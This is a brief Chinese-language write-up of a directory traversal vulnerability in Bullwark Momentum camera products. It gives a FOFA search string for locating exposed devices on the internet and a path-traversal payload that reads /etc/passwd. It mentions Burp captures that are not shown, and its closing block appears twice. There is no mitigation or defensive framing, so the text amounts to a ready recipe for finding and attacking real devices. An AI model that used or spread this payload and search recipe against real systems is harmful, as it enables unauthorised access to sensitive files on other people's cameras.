Bullwark Momentum 目录遍历漏洞
Bullwark Momentum中存在一款摄像头产产品
输入某个特定地址:即可暴露出敏感信息
参考:
FoFa搜索:app="Bullwark Momentum"
即可找到多款产品
输入特定路径:
/../../../../../../../../../../../../../etc/passwd
即可暴露信息 以下为Burp抓包
已经暴露信息。
End!!!
输入特定路径:
/../../../../../../../../../../../../../etc/passwd
即可暴露信息 以下为Burp抓包
已经暴露信息。
End!!!